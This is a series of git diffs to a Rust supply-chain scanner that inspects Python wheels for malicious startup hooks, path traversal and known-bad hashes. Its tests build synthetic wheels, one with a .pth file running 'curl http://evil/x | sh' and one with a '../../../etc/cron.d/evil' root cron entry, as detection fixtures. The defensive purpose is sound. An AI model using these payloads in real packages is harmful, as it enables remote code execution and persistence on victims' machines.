-/// A3 skeleton: returns no findings. B5 to B8 replace this with the real
-/// correlation that maps signal sets to the artifact RuleIds. Kept as a named
-/// seam (rather than inlined into [`evaluate_artifact`]) so the analyzers extend
-/// one place and `evaluate_artifact` stays the stable policy boundary.
+/// B8 fills the A3 seam: it delegates to
+/// [`crate::artifact::correlate::correlate_inspection_findings`], which maps the
+/// startup-hook (B6) and RECORD/ownership (B5) signal sets to their RuleIds and
+/// applies the DB-gated `ArtifactKnownMalicious` hash check. The per-member native
+/// chains (B7) are decided during byte inspection, not from the merged signal set,
+/// so a caller that has them (the [`crate::artifact::inspect`] path) folds them in
+/// via [`evaluate_inspected_artifact`]; this seam passes an empty native slice
+/// (so [`evaluate_artifact`] on a bare inspection still yields the non-native
+/// findings). A clean inspection has no signals and yields no findings.
 fn correlate_findings(
-    _inspection: &ArtifactInspection,
-    _threat_db: Option<&ThreatDb>,
+    inspection: &ArtifactInspection,
+    threat_db: Option<&ThreatDb>,
 ) -> Vec<Finding> {
-    Vec::new()
+    crate::artifact::correlate::correlate_inspection_findings(inspection, &[], threat_db)
 }
 
 /// Serialize an [`Ecosystem`] as its lowercase name, mirroring

--- a/crates/tirith-core/src/mcp/output_filter.rs
+++ b/crates/tirith-core/src/mcp/output_filter.rs
@@ -470,7 +470,9 @@ fn is_injection_seed_rule(rule_id: RuleId) -> bool {
         | RuleId::NativeImportExecutionChain
         // B8 + DB-D artifact/member known-malicious hash match: a structural
         // artifact finding (feature-gated), never an injection seed.
-        | RuleId::ArtifactKnownMalicious => false,
+        | RuleId::ArtifactKnownMalicious
+        // B8 wheel structural rejection: a structural artifact finding, never a seed.
+        | RuleId::WheelStructurallyRejected => false,
     }
 }
 

--- a/crates/tirith-core/src/mcp/output_filter.rs
+++ b/crates/tirith-core/src/mcp/output_filter.rs
@@ -467,7 +467,10 @@ fn is_injection_seed_rule(rule_id: RuleId) -> bool {
         | RuleId::PythonStartupHookCrossRuntime
         // B7 native import-execution chain: a structural artifact finding, not an
         // injection seed, so it is never downgraded to a redacted Warn.
-        | RuleId::NativeImportExecutionChain => false,
+        | RuleId::NativeImportExecutionChain
+        // B8 + DB-D artifact/member known-malicious hash match: a structural
+        // artifact finding (feature-gated), never an injection seed.
+        | RuleId::ArtifactKnownMalicious => false,
     }
 }
 

--- a/crates/tirith-core/src/scan.rs
+++ b/crates/tirith-core/src/scan.rs
@@ -1687,7 +1687,10 @@ mod tests {
         // so it fires NO startup/native/integrity signal) plus valid minimal dist-info.
         let mut zw = ZipWriter::new(std::io::Cursor::new(Vec::new()));
         for (name, body) in [
-            ("../../../etc/cron.d/evil", b"* * * * * root sh\n".as_slice()),
+            (
+                "../../../etc/cron.d/evil",
+                b"* * * * * root sh\n".as_slice(),
+            ),
             (
                 "demo-1.0.dist-info/METADATA",
                 b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice(),
@@ -1712,11 +1715,11 @@ mod tests {
 
         // The rejected wheel is surfaced as a coverage gap, NOT a clean inspected result.
         assert!(
-            result.coverage_gaps.iter().any(|g| g.kind
-                == CoverageGapKind::Unsupported
-                && g.location
-                    .to_string()
-                    .contains("demo-1.0-py3-none-any.whl")),
+            result
+                .coverage_gaps
+                .iter()
+                .any(|g| g.kind == CoverageGapKind::Unsupported
+                    && g.location.to_string().contains("demo-1.0-py3-none-any.whl")),
             "a structurally rejected wheel must produce a coverage gap, not pass clean: {:?}",
             result.coverage_gaps
         );

--- a/crates/tirith-core/src/scan.rs
+++ b/crates/tirith-core/src/scan.rs
@@ -214,17 +214,28 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
         &config.exclude_patterns,
     );
     let mut files = collected.text_candidates;
-    // Artifact candidates (`.so`/`.whl`/...) have no analyzer yet; each becomes
-    // an `Unsupported` coverage gap so they are never silently dropped.
-    let mut coverage_gaps: Vec<CoverageGap> = collected
-        .artifact_candidates
-        .iter()
-        .map(|p| CoverageGap {
-            location: SubjectLocation::from_path(p.clone()),
-            kind: CoverageGapKind::Unsupported,
-            sha256: hash_path_within_budget(p),
-        })
-        .collect();
+    // B8a — magic-dispatch each artifact candidate (`.whl`/`.so`/...) into the real
+    // artifact scanner instead of recording a blanket `Unsupported` gap. A wheel is
+    // inspected (A4 reader + B5/B6/B7) and its findings become member-qualified
+    // `FileScanResult`s that flow through the existing JSON/SARIF/exit path; an
+    // unsupported/unreadable candidate (an sdist, a bare `.so` with no archive
+    // wrapper, an oversize file) still records a coverage gap so it is never
+    // silently dropped.
+    let mut coverage_gaps: Vec<CoverageGap> = Vec::new();
+    let mut artifact_results: Vec<FileScanResult> = Vec::new();
+    // Distinct artifacts that were actually inspected (NOT the per-finding result
+    // count), so `scanned_count` reflects files scanned, not findings produced.
+    let mut artifacts_inspected = 0usize;
+    for p in &collected.artifact_candidates {
+        let (mut results, gap) = inspect_artifact_candidate(p);
+        if gap.is_none() {
+            artifacts_inspected += 1;
+        }
+        artifact_results.append(&mut results);
+        if let Some(gap) = gap {
+            coverage_gaps.push(gap);
+        }
+    }
 
     files.sort_by(|a, b| {
         let a_priority = is_priority_file(a);
@@ -252,6 +263,12 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
     }
 
     let mut file_results = Vec::new();
+    // Artifact-inspection findings (member-qualified) join the file results so they
+    // flow through the same JSON/SARIF/human emitters and exit-code logic. They are
+    // counted once per artifact (`artifacts_inspected`), not once per result, so a
+    // wheel with several findings still counts as one scanned file.
+    file_results.append(&mut artifact_results);
+    let mut text_files_scanned = 0usize;
     let mut panic_files = Vec::new();
     for file_path in &files {
         // Panic in any rule is bounded to its file; the rest of the walk
@@ -260,6 +277,7 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
         // size/IO skips; it is ALSO pushed as a `Panicked` coverage gap.
         match scan_single_file_guarded(file_path) {
             GuardedScanOutcome::Completed(ScanFileOutcome::Scanned(result)) => {
+                text_files_scanned += 1;
                 file_results.push(result)
             }
             GuardedScanOutcome::Completed(ScanFileOutcome::Skipped(gap)) => {
@@ -275,7 +293,9 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
     }
 
     ScanResult {
-        scanned_count: file_results.len(),
+        // Files scanned = text files + distinct artifacts inspected (a wheel with
+        // multiple findings is one scanned file, not several).
+        scanned_count: text_files_scanned + artifacts_inspected,
         skipped_count,
         truncated,
         truncation_reason,
@@ -283,6 +303,110 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
         coverage_gaps,
         file_results,
     }
+}
+
+/// Magic-dispatch one artifact candidate into the artifact scanner (B8a). Returns
+/// the member-qualified [`FileScanResult`]s its findings produce, plus an optional
+/// [`CoverageGap`] when the candidate could not be inspected as a wheel (an sdist /
+/// unknown magic / unreadable / oversize), so an artifact is never silently
+/// dropped. A successfully inspected wheel with NO findings still yields one empty
+/// result (located at the wheel) so it counts as scanned.
+///
+/// Each finding becomes its OWN result located at the finding's member-qualified
+/// path (`foo.whl!/pkg/bootstrap.pth`, B8f) when one is recoverable from the
+/// finding's evidence, else the outer wheel path — so JSON/SARIF show the offending
+/// member, not just the container. Policy override finalization is applied via
+/// `evaluate_inspected_artifact` so a strict integrity policy's `action_overrides`
+/// are honored on this path too (the verdict's findings carry the overridden
+/// severities).
+fn inspect_artifact_candidate(path: &Path) -> (Vec<FileScanResult>, Option<CoverageGap>) {
+    use crate::artifact::inspect::{inspect_artifact_file, InspectedArtifact};
+
+    let inspected: InspectedArtifact = match inspect_artifact_file(path) {
+        Ok(i) => i,
+        Err(e) => {
+            // Not inspectable as a wheel: record a coverage gap (best-effort hash
+            // for a later content-addressed lookup) so it is never read as clean.
+            return (
+                Vec::new(),
+                Some(CoverageGap {
+                    location: SubjectLocation::from_path(path.to_path_buf()),
+                    kind: e.gap_kind(),
+                    sha256: hash_path_within_budget(path),
+                }),
+            );
+        }
+    };
+
+    // Discover the operator policy for this path so per-rule severity/action
+    // overrides are honored (the artifact path is a static-verdict site too).
+    let cwd = path
+        .parent()
+        .map(|p| p.display().to_string())
+        .filter(|s| !s.is_empty());
+    let policy = crate::policy::Policy::discover(cwd.as_deref());
+
+    let verdict = crate::artifact::evaluate_inspected_artifact(
+        &inspected.inspection,
+        &inspected.native_findings,
+        &policy,
+        None,
+    );
+
+    let mut results: Vec<FileScanResult> = Vec::new();
+    for finding in verdict.findings {
+        // Locate the finding at its member-qualified location when one is present in
+        // the evidence (B8f); else at the outer wheel.
+        let loc = artifact_finding_location(&finding, path);
+        results.push(FileScanResult {
+            path: loc,
+            findings: vec![finding],
+            is_config_file: false,
+        });
+    }
+
+    // A clean wheel (no findings) still counts as scanned: emit one empty result at
+    // the outer wheel path.
+    if results.is_empty() {
+        results.push(FileScanResult {
+            path: path.to_path_buf(),
+            findings: Vec::new(),
+            is_config_file: false,
+        });
+    }
+
+    (results, None)
+}
+
+/// Recover the member-qualified location (`foo.whl!/member`) for an artifact
+/// finding from the first `outer!/member` token in its evidence; else the outer
+/// artifact path. Used so each artifact finding's JSON/SARIF path names the
+/// offending member (B8f).
+fn artifact_finding_location(finding: &Finding, outer: &Path) -> PathBuf {
+    use crate::verdict::Evidence;
+    let outer_display = outer.display().to_string();
+    for ev in &finding.evidence {
+        if let Evidence::Text { detail } = ev {
+            // A member-qualified location renders `<outer>!/<member>`; find the first
+            // such token that names THIS outer artifact.
+            for token in detail.split_whitespace() {
+                let cleaned = token.trim_matches(|c| matches!(c, '\'' | '"' | '(' | ')' | ','));
+                if let Some(idx) = cleaned.find("!/") {
+                    let (outer_part, _) = cleaned.split_at(idx);
+                    // Match on the basename so a relative vs absolute outer path
+                    // still attaches to this artifact.
+                    let outer_base = outer
+                        .file_name()
+                        .and_then(|n| n.to_str())
+                        .unwrap_or(&outer_display);
+                    if outer_part.ends_with(outer_base) || outer_part == outer_display {
+                        return PathBuf::from(cleaned);
+                    }
+                }
+            }
+        }
+    }
+    outer.to_path_buf()
 }
 
 /// Maximum analyzable content size: 10 MiB. Large enough for any realistic
@@ -1367,6 +1491,88 @@ mod tests {
         assert!(
             !names.contains(&"artifact.md"),
             "files under out/.turbo/coverage/.expo should be skipped, got {names:?}"
+        );
+    }
+
+    /// B8a regression: a directory scan over a tree containing a `.whl` must
+    /// actually INSPECT the wheel (A2 dropped artifact candidates during collection,
+    /// so the wheel was never opened). A wheel with an executable `.pth` must surface
+    /// the startup finding rather than a blanket `Unsupported` coverage gap.
+    #[test]
+    fn test_directory_scan_inspects_wheel_member() {
+        use std::io::Write as _;
+        use zip::write::SimpleFileOptions;
+        use zip::ZipWriter;
+
+        let tmp = tempfile::tempdir().expect("create temp dir");
+        let root = tmp.path();
+        // A benign text file alongside the wheel.
+        std::fs::write(root.join("README.md"), "hello").unwrap();
+
+        // A wheel bundling an executable `.pth` that spawns a subprocess at startup.
+        let mut zw = ZipWriter::new(std::io::Cursor::new(Vec::new()));
+        for (name, body) in [
+            (
+                "evil.pth",
+                b"import os; os.system('curl http://evil/x | sh')\n".as_slice(),
+            ),
+            (
+                "demo-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice(),
+            ),
+            (
+                "demo-1.0.dist-info/RECORD",
+                b"demo-1.0.dist-info/RECORD,,\n".as_slice(),
+            ),
+        ] {
+            zw.start_file(name, SimpleFileOptions::default()).unwrap();
+            zw.write_all(body).unwrap();
+        }
+        let wheel_bytes = zw.finish().unwrap().into_inner();
+        std::fs::write(root.join("demo-1.0-py3-none-any.whl"), &wheel_bytes).unwrap();
+
+        let config = ScanConfig {
+            path: root.to_path_buf(),
+            recursive: true,
+            fail_on: Severity::High,
+            ignore_patterns: Vec::new(),
+            include_patterns: Vec::new(),
+            exclude_patterns: Vec::new(),
+            max_files: None,
+        };
+        let result = scan(&config);
+
+        // The wheel was inspected, not dropped: no `Unsupported` gap for it.
+        assert!(
+            !result
+                .coverage_gaps
+                .iter()
+                .any(|g| g.kind == CoverageGapKind::Unsupported),
+            "the wheel must be inspected, not recorded as an Unsupported gap: {:?}",
+            result.coverage_gaps
+        );
+        // The executable `.pth` fired the B6 startup finding.
+        assert!(
+            result
+                .file_results
+                .iter()
+                .flat_map(|r| &r.findings)
+                .any(|f| f.rule_id == crate::verdict::RuleId::PythonStartupHookSuspicious),
+            "a directory scan over a wheel with an executable .pth must fire the startup \
+             finding; results: {:?}",
+            result
+                .file_results
+                .iter()
+                .flat_map(|r| r.findings.iter().map(|f| f.rule_id))
+                .collect::<Vec<_>>()
+        );
+        // The finding is located at the member-qualified path (B8f).
+        assert!(
+            result
+                .file_results
+                .iter()
+                .any(|r| { !r.findings.is_empty() && r.path.display().to_string().contains("!/") }),
+            "an artifact finding must carry a member-qualified `foo.whl!/member` path"
         );
     }
 

--- a/crates/tirith-core/src/scan.rs
+++ b/crates/tirith-core/src/scan.rs
@@ -381,6 +381,24 @@ fn inspect_artifact_candidate(
         });
     }
 
+    // A structurally REJECTED wheel (path traversal, encrypted member, CRC failure,
+    // duplicate paths) must NEVER read as clean on the scan path: surface a coverage gap so
+    // `tirith scan` does not exit 0 and report it clean. This mirrors pre-B8 (every wheel
+    // was an Unsupported gap) and the package-inspect path, which forces Block on the same
+    // condition. Any signal findings that DID fire from the partial inspection are returned
+    // alongside the gap. `Unsupported` on a `.whl` is security-relevant, so the gap is not
+    // silently benign.
+    if inspected.rejected {
+        return (
+            results,
+            Some(CoverageGap {
+                location: SubjectLocation::from_path(path.to_path_buf()),
+                kind: CoverageGapKind::Unsupported,
+                sha256: hash_path_within_budget(path),
+            }),
+        );
+    }
+
     // A clean wheel (no findings) still counts as scanned: emit one empty result at
     // the outer wheel path.
     if results.is_empty() {
@@ -1651,6 +1669,56 @@ mod tests {
                 .iter()
                 .any(|r| { !r.findings.is_empty() && r.path.display().to_string().contains("!/") }),
             "an artifact finding must carry a member-qualified `foo.whl!/member` path"
+        );
+    }
+
+    /// B8 re-review: a structurally REJECTED wheel (path traversal) with NO B5/B6/B7 signal
+    /// must NOT scan as clean - it surfaces a coverage gap (mirroring the package-inspect
+    /// Block on the same condition), not a silent pass / exit 0.
+    #[test]
+    fn test_directory_scan_rejected_wheel_is_not_clean() {
+        use std::io::Write as _;
+        use zip::write::SimpleFileOptions;
+        use zip::ZipWriter;
+
+        let tmp = tempfile::tempdir().expect("create temp dir");
+        let root = tmp.path();
+        // A wheel whose only payload is a path-traversal entry (not a `.pth`/`.so`/RECORD,
+        // so it fires NO startup/native/integrity signal) plus valid minimal dist-info.
+        let mut zw = ZipWriter::new(std::io::Cursor::new(Vec::new()));
+        for (name, body) in [
+            ("../../../etc/cron.d/evil", b"* * * * * root sh\n".as_slice()),
+            (
+                "demo-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n".as_slice(),
+            ),
+        ] {
+            zw.start_file(name, SimpleFileOptions::default()).unwrap();
+            zw.write_all(body).unwrap();
+        }
+        let wheel_bytes = zw.finish().unwrap().into_inner();
+        std::fs::write(root.join("demo-1.0-py3-none-any.whl"), &wheel_bytes).unwrap();
+
+        let config = ScanConfig {
+            path: root.to_path_buf(),
+            recursive: true,
+            fail_on: Severity::High,
+            ignore_patterns: Vec::new(),
+            include_patterns: Vec::new(),
+            exclude_patterns: Vec::new(),
+            max_files: None,
+        };
+        let result = scan(&config);
+
+        // The rejected wheel is surfaced as a coverage gap, NOT a clean inspected result.
+        assert!(
+            result.coverage_gaps.iter().any(|g| g.kind
+                == CoverageGapKind::Unsupported
+                && g.location
+                    .to_string()
+                    .contains("demo-1.0-py3-none-any.whl")),
+            "a structurally rejected wheel must produce a coverage gap, not pass clean: {:?}",
+            result.coverage_gaps
         );
     }
 

--- a/crates/tirith-core/src/scan.rs
+++ b/crates/tirith-core/src/scan.rs
@@ -226,8 +226,14 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
     // Distinct artifacts that were actually inspected (NOT the per-finding result
     // count), so `scanned_count` reflects files scanned, not findings produced.
     let mut artifacts_inspected = 0usize;
+    // Load the threat DB ONCE for the whole artifact pass (the cache re-checks mtime
+    // internally, so this is cheap, but we still hold the Arc rather than re-fetching
+    // per artifact) and thread it into the hash-lookup seam. Latent today (the
+    // hash-lookup seam returns None until the DB-B methods land), but this is the
+    // correct wiring so the artifact path consults the same DB the engine does.
+    let artifact_threat_db = crate::threatdb::ThreatDb::cached();
     for p in &collected.artifact_candidates {
-        let (mut results, gap) = inspect_artifact_candidate(p);
+        let (mut results, gap) = inspect_artifact_candidate(p, artifact_threat_db.as_deref());
         if gap.is_none() {
             artifacts_inspected += 1;
         }
@@ -319,7 +325,10 @@ pub fn scan(config: &ScanConfig) -> ScanResult {
 /// `evaluate_inspected_artifact` so a strict integrity policy's `action_overrides`
 /// are honored on this path too (the verdict's findings carry the overridden
 /// severities).
-fn inspect_artifact_candidate(path: &Path) -> (Vec<FileScanResult>, Option<CoverageGap>) {
+fn inspect_artifact_candidate(
+    path: &Path,
+    threat_db: Option<&crate::threatdb::ThreatDb>,
+) -> (Vec<FileScanResult>, Option<CoverageGap>) {
     use crate::artifact::inspect::{inspect_artifact_file, InspectedArtifact};
 
     let inspected: InspectedArtifact = match inspect_artifact_file(path) {
@@ -350,14 +359,21 @@ fn inspect_artifact_candidate(path: &Path) -> (Vec<FileScanResult>, Option<Cover
         &inspected.inspection,
         &inspected.native_findings,
         &policy,
-        None,
+        threat_db,
     );
+
+    // The set of member-qualified location strings the inspection actually
+    // produced (`<wheel>!/<member>`), gathered from the inspected files, signals,
+    // and execution edges. `artifact_finding_location` resolves a finding's member
+    // by EXACT membership in this set rather than scraping any `!/`-bearing token,
+    // so a stray `!/` substring in evidence prose can never mislocate a finding.
+    let known_members = known_member_locations(&inspected.inspection);
 
     let mut results: Vec<FileScanResult> = Vec::new();
     for finding in verdict.findings {
         // Locate the finding at its member-qualified location when one is present in
         // the evidence (B8f); else at the outer wheel.
-        let loc = artifact_finding_location(&finding, path);
+        let loc = artifact_finding_location(&finding, path, &known_members);
         results.push(FileScanResult {
             path: loc,
             findings: vec![finding],
@@ -378,28 +394,48 @@ fn inspect_artifact_candidate(path: &Path) -> (Vec<FileScanResult>, Option<Cover
     (results, None)
 }
 
+/// The set of member-qualified location strings (`<wheel>!/<member>`) the
+/// inspection actually produced, drawn from its files, signals, and execution
+/// edges. `artifact_finding_location` matches a finding's evidence tokens against
+/// THIS set, so a member location is recovered by exact identity with a real
+/// member rather than by scraping any `!/`-bearing substring out of prose.
+fn known_member_locations(inspection: &crate::artifact::ArtifactInspection) -> Vec<String> {
+    let mut out: std::collections::BTreeSet<String> = std::collections::BTreeSet::new();
+    let mut add = |loc: &SubjectLocation| {
+        // Only locations that actually render with a `!/` member separator are
+        // candidate member locations.
+        if loc.member_path.is_some() {
+            out.insert(loc.to_string());
+        }
+    };
+    for f in &inspection.files {
+        add(&f.location);
+    }
+    for s in &inspection.signals {
+        add(&s.location);
+    }
+    for e in &inspection.execution_edges {
+        add(&e.from);
+        add(&e.to);
+    }
+    out.into_iter().collect()
+}
+
 /// Recover the member-qualified location (`foo.whl!/member`) for an artifact
-/// finding from the first `outer!/member` token in its evidence; else the outer
-/// artifact path. Used so each artifact finding's JSON/SARIF path names the
-/// offending member (B8f).
-fn artifact_finding_location(finding: &Finding, outer: &Path) -> PathBuf {
+/// finding by matching a token in its evidence against the inspection's KNOWN
+/// member locations; else the outer artifact path. Matching against the real
+/// member set (not any `!/`-bearing substring) is why a stray `!/` in evidence
+/// prose can never mislocate a finding. Used so each artifact finding's
+/// JSON/SARIF path names the offending member (B8f).
+fn artifact_finding_location(finding: &Finding, outer: &Path, known_members: &[String]) -> PathBuf {
     use crate::verdict::Evidence;
-    let outer_display = outer.display().to_string();
-    for ev in &finding.evidence {
-        if let Evidence::Text { detail } = ev {
-            // A member-qualified location renders `<outer>!/<member>`; find the first
-            // such token that names THIS outer artifact.
-            for token in detail.split_whitespace() {
-                let cleaned = token.trim_matches(|c| matches!(c, '\'' | '"' | '(' | ')' | ','));
-                if let Some(idx) = cleaned.find("!/") {
-                    let (outer_part, _) = cleaned.split_at(idx);
-                    // Match on the basename so a relative vs absolute outer path
-                    // still attaches to this artifact.
-                    let outer_base = outer
-                        .file_name()
-                        .and_then(|n| n.to_str())
-                        .unwrap_or(&outer_display);
-                    if outer_part.ends_with(outer_base) || outer_part == outer_display {
+    if !known_members.is_empty() {
+        for ev in &finding.evidence {
+            if let Evidence::Text { detail } = ev {
+                for token in detail.split_whitespace() {
+                    let cleaned = token.trim_matches(|c| matches!(c, '\'' | '"' | '(' | ')' | ','));
+                    // EXACT membership in the inspection's real member locations.
+                    if known_members.iter().any(|m| m == cleaned) {
                         return PathBuf::from(cleaned);
                     }
                 }
@@ -1573,6 +1609,62 @@ mod tests {
                 .iter()
                 .any(|r| { !r.findings.is_empty() && r.path.display().to_string().contains("!/") }),
             "an artifact finding must carry a member-qualified `foo.whl!/member` path"
+        );
+    }
+
+    /// T3.26: `artifact_finding_location` recovers a member location by EXACT
+    /// membership in the inspection's real member set, not by scraping any
+    /// `!/`-bearing token. A stray `!/` substring in evidence prose that is NOT a
+    /// real member must fall back to the outer artifact path; a token that IS a
+    /// known member resolves to that member.
+    #[test]
+    fn artifact_finding_location_matches_known_members_exactly() {
+        use crate::verdict::{Evidence, Finding, RuleId, Severity};
+
+        let outer = Path::new("/repo/demo-1.0-py3-none-any.whl");
+        let real_member = "demo-1.0-py3-none-any.whl!/demo/boot.pth".to_string();
+        let known = vec![real_member.clone()];
+
+        // (1) A finding naming the REAL member resolves to it.
+        let f_real = Finding {
+            rule_id: RuleId::PythonStartupHookSuspicious,
+            severity: Severity::High,
+            title: "t".to_string(),
+            description: "d".to_string(),
+            evidence: vec![Evidence::Text {
+                detail: format!("location: {real_member}"),
+            }],
+            human_view: None,
+            agent_view: None,
+            mitre_id: None,
+            custom_rule_id: None,
+        };
+        assert_eq!(
+            artifact_finding_location(&f_real, outer, &known),
+            PathBuf::from(&real_member),
+            "a known member location must resolve to that member"
+        );
+
+        // (2) A finding whose prose contains a stray `!/` token that is NOT a real
+        // member must fall back to the OUTER path, never mislocating to the bogus
+        // token (the fragility the scrape had).
+        let f_bogus = Finding {
+            rule_id: RuleId::PythonStartupHookSuspicious,
+            severity: Severity::High,
+            title: "t".to_string(),
+            description: "d".to_string(),
+            evidence: vec![Evidence::Text {
+                detail: "see https://example.test/path!/not-a-member for details".to_string(),
+            }],
+            human_view: None,
+            agent_view: None,
+            mitre_id: None,
+            custom_rule_id: None,
+        };
+        assert_eq!(
+            artifact_finding_location(&f_bogus, outer, &known),
+            outer.to_path_buf(),
+            "a stray `!/` token that is not a real member must fall back to the outer path"
         );
     }
 

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -343,7 +343,10 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::NativeImportExecutionChain
         // B8 + DB-D: artifact/member known-malicious hash match — a structural
         // artifact verdict (feature-gated), not a reputation/threat-intel score.
-        | RuleId::ArtifactKnownMalicious => false,
+        | RuleId::ArtifactKnownMalicious
+        // B8: a wheel structurally rejected by the hardened reader — a structural
+        // artifact verdict, not a threat-DB indicator.
+        | RuleId::WheelStructurallyRejected => false,
     }
 }
 

--- a/crates/tirith-core/src/scoring.rs
+++ b/crates/tirith-core/src/scoring.rs
@@ -340,7 +340,10 @@ pub fn is_threat_intel_rule(rule_id: RuleId) -> bool {
         | RuleId::PythonStartupHookCrossRuntime
         // B7: native import-execution chain, correlated from native-triage signals
         // (structural object-format analysis), not a threat-DB indicator.
-        | RuleId::NativeImportExecutionChain => false,
+        | RuleId::NativeImportExecutionChain
+        // B8 + DB-D: artifact/member known-malicious hash match — a structural
+        // artifact verdict (feature-gated), not a reputation/threat-intel score.
+        | RuleId::ArtifactKnownMalicious => false,
     }
 }
 

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -798,6 +798,19 @@ pub enum RuleId {
     /// Mere native-module presence yields at most an informational signal, never
     /// this finding.
     NativeImportExecutionChain,
+    /// B8 + DB-D: an inspected artifact (a wheel/sdist) or one of its members has a
+    /// SHA-256 that matches a KNOWN-MALICIOUS hash in the threat DB (MITRE T1195
+    /// supply-chain compromise). Emitted by `crate::artifact::evaluate_artifact`
+    /// only when the `artifact-hash-lookup` cargo feature is enabled AND the DB-B
+    /// hash-lookup methods (`ThreatDb::check_artifact_sha256` /
+    /// `check_file_sha256`) resolve a match. Those methods are the DB-B deliverable
+    /// and DO NOT EXIST YET, so this milestone ships the feature OFF by default and
+    /// the emission behind a reserved seam (see `crate::artifact::correlate`); the
+    /// RuleId is therefore UNREACHABLE until the feature + DB land. Registered now
+    /// (the registry tests must see every variant), with NO PATTERN_TABLE entry and
+    /// NO fixture, so it lives in `EXTERNALLY_TRIGGERED_RULES`. Critical severity
+    /// (whence the action is Block).
+    ArtifactKnownMalicious,
 }
 
 impl fmt::Display for RuleId {

--- a/crates/tirith-core/src/verdict.rs
+++ b/crates/tirith-core/src/verdict.rs
@@ -811,6 +811,15 @@ pub enum RuleId {
     /// NO fixture, so it lives in `EXTERNALLY_TRIGGERED_RULES`. Critical severity
     /// (whence the action is Block).
     ArtifactKnownMalicious,
+    /// A wheel/archive STRUCTURALLY REJECTED by the hardened reader (a path-traversal
+    /// entry, an encrypted member, a CRC mismatch, or a duplicate-path collision) - a hard
+    /// fault the B5/B6/B7 signal correlation does not surface as a finding. `package
+    /// inspect` synthesizes this finding (carrying the violation detail strings) for a
+    /// rejected artifact so the `findings` array is non-empty whenever the action is Block
+    /// due to a rejection (a CI consumer gating on `findings.length` must not pass a
+    /// path-traversal wheel). Triggered by artifact inspection, not a PATTERN_TABLE string,
+    /// so it lives in `EXTERNALLY_TRIGGERED_RULES` with no fixture. High severity.
+    WheelStructurallyRejected,
 }
 
 impl fmt::Display for RuleId {

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -776,6 +776,8 @@ const ALL_RULE_IDS: &[&str] = &[
     "python_startup_hook_cross_runtime",
     // B7 native import-execution chain (correlated by native triage)
     "native_import_execution_chain",
+    // B8 + DB-D artifact/member known-malicious hash match (feature-gated)
+    "artifact_known_malicious",
 ];
 
 /// Collect all expected_rules from all fixture files into a set.
@@ -1037,6 +1039,14 @@ const EXTERNALLY_TRIGGERED_RULES: &[&str] = &[
     // control, the malformed/streaming paths) + the `ecosystem_scan` installed
     // native-triage test.
     "native_import_execution_chain",
+    // B8 + DB-D: `artifact_known_malicious` is emitted by
+    // `crate::artifact::evaluate_artifact` ONLY under the `artifact-hash-lookup`
+    // cargo feature (OFF by default) once the DB-B hash-lookup methods land. The
+    // RuleId is registered now so the registry tests see every variant, but it is
+    // UNREACHABLE in the default build (no feature, no DB method), so it has no
+    // PATTERN_TABLE entry and no fixture. Covered by the feature-gated emission
+    // seam in `artifact/correlate.rs` once DB-B ships.
+    "artifact_known_malicious",
 ];
 
 /// Collect expected_rules across the output-direction fixture files.
@@ -1310,6 +1320,8 @@ rule_id_variant_registry! {
     PythonStartupHookSuspicious, PythonStartupHookCrossRuntime,
     // Native import-execution chain (B7)
     NativeImportExecutionChain,
+    // Artifact/member known-malicious hash match (B8 + DB-D, feature-gated)
+    ArtifactKnownMalicious,
 }
 
 /// Verify ALL_RULE_IDS stays in sync with the RuleId enum (the variant count is

--- a/crates/tirith-core/tests/golden_fixtures.rs
+++ b/crates/tirith-core/tests/golden_fixtures.rs
@@ -778,6 +778,8 @@ const ALL_RULE_IDS: &[&str] = &[
     "native_import_execution_chain",
     // B8 + DB-D artifact/member known-malicious hash match (feature-gated)
     "artifact_known_malicious",
+    // B8 wheel structural rejection (synthesized by package inspect, not the engine)
+    "wheel_structurally_rejected",
 ];
 
 /// Collect all expected_rules from all fixture files into a set.
@@ -1047,6 +1049,11 @@ const EXTERNALLY_TRIGGERED_RULES: &[&str] = &[
     // PATTERN_TABLE entry and no fixture. Covered by the feature-gated emission
     // seam in `artifact/correlate.rs` once DB-B ships.
     "artifact_known_malicious",
+    // B8: `wheel_structurally_rejected` is synthesized by `tirith package inspect` for a
+    // structurally rejected wheel (path traversal, encrypted member, CRC mismatch,
+    // duplicate-path collision). It is triggered by artifact inspection at the CLI, not by
+    // the engine over a fixture string, so it has no PATTERN_TABLE entry and no fixture.
+    "wheel_structurally_rejected",
 ];
 
 /// Collect expected_rules across the output-direction fixture files.
@@ -1322,6 +1329,8 @@ rule_id_variant_registry! {
     NativeImportExecutionChain,
     // Artifact/member known-malicious hash match (B8 + DB-D, feature-gated)
     ArtifactKnownMalicious,
+    // Wheel structurally rejected by the hardened reader (B8, externally triggered)
+    WheelStructurallyRejected,
 }
 
 /// Verify ALL_RULE_IDS stays in sync with the RuleId enum (the variant count is

--- a/crates/tirith/Cargo.toml
+++ b/crates/tirith/Cargo.toml
@@ -19,6 +19,14 @@ path = "src/main.rs"
 name = "tirith-threatdb-compile"
 path = "src/bin/tirith_threatdb_compile.rs"
 
+[features]
+# Pass-through to `tirith-core`'s off-by-default artifact / member hash
+# known-malicious lookup seam (DB-gated; see tirith-core's `[features]`). Keeping
+# the forwarding feature here means DB-D activation is one CLI flag, not a code
+# change. OFF by default; building `tirith` with this on compiles and tests today.
+default = []
+artifact-hash-lookup = ["tirith-core/artifact-hash-lookup"]
+
 [dependencies]
 tirith-core = { workspace = true }
 clap = { workspace = true }
@@ -66,6 +74,9 @@ tower-lsp = "0.20"
 
 [dev-dependencies]
 mockito = "1"
+# Build synthetic wheels (ZIP archives) in the `package inspect` / `scan`
+# artifact-inspection integration tests. Matches tirith-core's `zip` features.
+zip = { version = "2", default-features = false, features = ["deflate"] }
 
 [package.metadata.deb]
